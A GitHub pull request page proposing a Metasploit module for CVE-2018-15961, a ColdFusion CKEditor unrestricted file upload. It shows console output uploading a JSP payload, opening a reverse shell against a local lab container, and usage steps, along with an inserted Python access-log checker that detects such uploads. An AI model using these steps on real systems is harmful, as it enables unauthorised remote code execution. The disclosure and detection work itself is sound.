Add CVE-2018-15961 Adobe ColdFusion CKEditor unrestricted file upload #11201

Closed
wants to merge 2 commits into
base: master
from

Qazeer commented Jan 6, 2019

Hello everyone,

This module exploits the unrestricted file upload flaw in the Adobe ColdFusion CKEditor, affecting ColdFusion 11 (Update 14 and earlier), ColdFusion 2016 (Update 6 and earlier), and ColdFusion 2018 (July 12 release). The vulnerability goes by CVE-2018-15961.

The exploitation is pretty basic: a JSP payload is uploaded through a single unauthenticated POST request and executed through a following unauthenticated GET request.

This module was successfully tested against a Linux Adobe ColdFusion 2018 installation using the docker container provided by Adobe (https://bintray.com/eaps/coldfusion/cf%3Acoldfusion/2018.0.0).

Output

msf > use exploit/multi/http/coldfusion_ckeditor_file_upload
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set RPORT 8500
RPORT => 8500
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf exploit(multi/http/coldfusion_ckeditor_file_upload) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Uploading the JSP payload at /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/LKDZNMPN.jsp...
[+] Upload succeeded! Executing payload...
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:38568) at 2019-01-06 05:07:54 +0100

whoami
cfuser

Verification

msfconsole
use exploit/multi/http/coldfusion_ckeditor_file_upload
set srvhost
set RHOST
set RPORT
// If necessary
set payload
set LHOST
set LPORT
run

TODO

Should be working on Windows and Adobe 2016 as the URL used does not change, but not tested.
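As an added defender-side example (not part of this PR or of the module itself): a small Python checker that scans a constructed Apache-style access log for a GET of a server-side script under the uploadedFiles directory shown in the output above, and records whether the same client POSTed to the filemanager plugin earlier in the log. The log format and the upload handler file name (upload.cfm) are assumptions.

```python
import re

# Upload directory taken from the module output in this PR.
UPLOAD_DIR = "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/"
# Any POST under the filemanager plugin is treated as an upload attempt; the
# exact handler file name is not stated in the PR (assumption).
FILEMANAGER_PREFIX = "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/"
# Server-side extensions that should never be fetched from an upload directory.
EXEC_EXT = (".jsp", ".jspx", ".cfm", ".cfml", ".cfc")

# Apache/NCSA combined log format (assumed; adjust for the real web server).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def parse_line(line):
    """Parse one access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_webshell_fetches(lines):
    """Return (ip, path, preceded_by_upload) for every GET of a server-side
    script inside the CKEditor upload directory; preceded_by_upload is True
    when the same source IP POSTed to the filemanager earlier in the log."""
    uploaders = set()
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path = rec["path"].split("?", 1)[0]          # drop the query string
        if rec["method"] == "POST" and path.startswith(FILEMANAGER_PREFIX):
            uploaders.add(rec["ip"])
        elif (rec["method"] == "GET" and path.startswith(UPLOAD_DIR)
              and path.lower().endswith(EXEC_EXT)):
            hits.append((rec["ip"], path, rec["ip"] in uploaders))
    return hits

# Constructed sample access log; the POST handler name is a placeholder.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jan/2019:05:07:53 +0100] "POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm?Command=FileUpload HTTP/1.1" 200 312
10.0.0.9 - - [06/Jan/2019:05:07:55 +0100] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 200 41234
10.0.0.5 - - [06/Jan/2019:05:07:54 +0100] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/LKDZNMPN.jsp HTTP/1.1" 200 0
10.0.0.7 - - [06/Jan/2019:05:09:10 +0100] "GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/logo.png HTTP/1.1" 200 8812
"""

if __name__ == "__main__":
    for ip, path, uploaded in find_webshell_fetches(SAMPLE_LOG.splitlines()):
        print(f"ALERT {ip} fetched {path} (prior filemanager POST: {uploaded})")
```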

bcoles commented Jan 6, 2019

Hi @Qazeer

It is required that code in your fork be merged from a unique branch in your repository to master in Rapid7's. Please create a new branch in your fork of framework and resubmit this from that branch.

git checkout -b <BRANCH_NAME>
git push <your_fork_remote> <BRANCH_NAME>

This helps protect the process, ensures users are aware of commits on the branch being considered for merge, provides a location for more commits to be offered without mingling with other contributors' changes, and allows contributors to make progress while a PR is still being reviewed.

Closing based on this requirement; please do resubmit from a unique branch.

@bcoles bcoles closed this Jan 6, 2019

bcoles left a comment

Please use spaces instead of tabs for indentation

bcoles commented Jan 6, 2019